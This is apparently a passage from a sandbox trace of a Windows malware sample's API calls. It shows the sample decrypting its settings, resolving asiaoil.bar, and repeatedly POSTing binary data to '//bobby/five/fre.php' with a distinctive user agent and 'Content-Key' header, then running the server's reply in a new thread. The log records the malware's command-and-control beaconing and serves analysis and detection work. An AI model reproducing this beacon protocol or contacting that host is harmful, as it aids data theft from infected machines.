(lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.723] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.723] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.724] GetProcessHeap () returned 0x740000 [0304.724] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0304.724] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.724] GetProcessHeap () returned 0x740000 [0304.724] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0304.724] GetProcessHeap () returned 0x740000 [0304.725] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0304.725] GetProcessHeap () returned 0x740000 [0304.725] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0304.725] GetProcessHeap () returned 0x740000 [0304.725] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0304.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.726] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.732] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0304.738] GetProcessHeap () returned 0x740000 [0304.738] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0304.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.739] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0304.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.740] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.741] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.741] GetProcessHeap () returned 0x740000 [0304.742] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0304.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.816] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0304.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.817] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0304.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.818] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0304.818] GetProcessHeap () returned 0x740000 [0304.818] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0304.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.819] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0304.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.820] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0304.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.821] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0304.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.822] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0304.822] GetProcessHeap () returned 0x740000 [0304.822] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0304.822] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0304.823] GetProcessHeap () returned 0x740000 [0304.823] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0304.823] socket (af=2, type=1, protocol=6) returned 0x2b4 [0304.824] connect (s=0x2b4, name=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0304.845] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0304.845] GetProcessHeap () returned 0x740000 [0304.846] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cdd0 [0304.846] GetProcessHeap () returned 0x740000 [0304.846] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0304.846] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0304.847] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0304.847] GetProcessHeap () returned 0x740000 [0304.847] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0304.847] GetProcessHeap () returned 0x740000 [0304.847] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0304.848] GetProcessHeap () returned 0x740000 [0304.848] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763e00 [0304.848] GetProcessHeap () returned 0x740000 [0304.848] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0304.848] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0304.849] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0304.849] GetProcessHeap () returned 0x740000 [0304.849] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0304.849] GetProcessHeap () returned 0x740000 [0304.850] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0304.850] send (s=0x2b4, buf=0x747928*, len=243, flags=0) returned 243 [0304.850] send (s=0x2b4, buf=0x761fd0*, len=159, flags=0) returned 159 [0304.850] GetProcessHeap () returned 0x740000 [0304.851] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0304.851] recv (in: s=0x2b4, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 571 [0304.949] GetProcessHeap () returned 0x740000 [0304.949] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0304.949] GetProcessHeap () returned 0x740000 [0304.950] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763e00 | out: hHeap=0x740000) returned 1 [0304.950] GetProcessHeap () returned 0x740000 [0304.950] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0304.950] GetProcessHeap () returned 0x740000 [0304.950] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cdd0 | out: hHeap=0x740000) returned 1 [0304.950] closesocket (s=0x2b4) returned 0 [0304.951] GetProcessHeap () returned 0x740000 [0304.951] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0304.951] GetProcessHeap () returned 0x740000 [0304.951] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0304.951] GetProcessHeap () returned 0x740000 [0304.951] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0304.951] GetProcessHeap () returned 0x740000 [0304.952] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0304.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x105c) returned 0x2b4 [0304.954] Sleep (dwMilliseconds=0xea60) [0304.956] GetProcessHeap () returned 0x740000 [0304.956] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0304.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.957] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.963] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75ce58) returned 1 [0304.969] GetProcessHeap () returned 0x740000 [0304.969] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0304.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.971] CryptImportKey (in: hProv=0x75ce58, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0304.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.972] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.973] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.973] GetProcessHeap () returned 0x740000 [0304.973] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0305.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.054] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0305.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.055] CryptDestroyKey (hKey=0x74d768) returned 1 [0305.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.056] CryptReleaseContext (hProv=0x75ce58, dwFlags=0x0) returned 1 [0305.056] GetProcessHeap () returned 0x740000 [0305.056] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0305.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.057] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.058] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.059] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.060] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.060] GetProcessHeap () returned 0x740000 [0305.060] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0305.060] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.060] GetProcessHeap () returned 0x740000 [0305.060] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0305.061] GetProcessHeap () returned 0x740000 [0305.061] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0305.061] GetProcessHeap () returned 0x740000 [0305.061] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0305.061] GetProcessHeap () returned 0x740000 [0305.061] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763db8 [0305.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.067] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cdd0) returned 1 [0305.074] GetProcessHeap () returned 0x740000 [0305.074] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0305.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.075] CryptImportKey (in: hProv=0x75cdd0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0305.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.083] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.084] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.084] GetProcessHeap () returned 0x740000 [0305.084] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0305.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.086] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763db8, pdwDataLen=0x19fcfc | out: pbData=0x763db8, pdwDataLen=0x19fcfc) returned 1 [0305.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.087] CryptDestroyKey (hKey=0x74d768) returned 1 [0305.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.088] CryptReleaseContext (hProv=0x75cdd0, dwFlags=0x0) returned 1 [0305.088] GetProcessHeap () returned 0x740000 [0305.088] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0305.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.090] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0305.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.091] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0305.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.092] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0305.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.093] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0305.093] GetProcessHeap () returned 0x740000 [0305.093] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be68 [0305.093] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0305.169] GetProcessHeap () returned 0x740000 [0305.169] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0305.169] socket (af=2, type=1, protocol=6) returned 0x2b8 [0305.169] connect (s=0x2b8, name=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0305.190] FreeAddrInfoW (pAddrInfo=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0305.190] GetProcessHeap () returned 0x740000 [0305.190] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0305.190] GetProcessHeap () returned 0x740000 [0305.190] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0305.190] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0305.191] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0305.191] GetProcessHeap () returned 0x740000 [0305.191] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0305.191] GetProcessHeap () returned 0x740000 [0305.192] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0305.192] GetProcessHeap () returned 0x740000 [0305.192] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0305.192] GetProcessHeap () returned 0x740000 [0305.192] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0305.193] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0305.194] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0305.194] GetProcessHeap () returned 0x740000 [0305.194] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0305.194] GetProcessHeap () returned 0x740000 [0305.194] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0305.194] send (s=0x2b8, buf=0x747928*, len=243, flags=0) returned 243 [0305.195] send (s=0x2b8, buf=0x761fd0*, len=159, flags=0) returned 159 [0305.195] GetProcessHeap () returned 0x740000 [0305.195] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0305.195] recv (in: s=0x2b8, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 575 [0305.294] GetProcessHeap () returned 0x740000 [0305.294] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0305.294] GetProcessHeap () returned 0x740000 [0305.295] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0305.295] GetProcessHeap () returned 0x740000 [0305.295] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0305.295] GetProcessHeap () returned 0x740000 [0305.295] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0305.295] closesocket (s=0x2b8) returned 0 [0305.296] GetProcessHeap () returned 0x740000 [0305.296] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0305.296] GetProcessHeap () returned 0x740000 [0305.296] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0305.296] GetProcessHeap () returned 0x740000 [0305.297] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763db8 | out: hHeap=0x740000) returned 1 [0305.297] GetProcessHeap () returned 0x740000 [0305.297] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be68 | out: hHeap=0x740000) returned 1 [0305.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1064) returned 0x2b8 [0305.300] Sleep (dwMilliseconds=0xea60) [0305.304] GetProcessHeap () returned 0x740000 [0305.305] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0305.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.314] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0305.323] GetProcessHeap () returned 0x740000 [0305.323] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0305.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.325] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0305.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.326] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.327] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.327] GetProcessHeap () returned 0x740000 [0305.328] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0305.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.329] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0305.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.397] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0305.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.398] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0305.398] GetProcessHeap () returned 0x740000 [0305.398] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766138 [0305.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.400] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.401] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.402] StrStrA 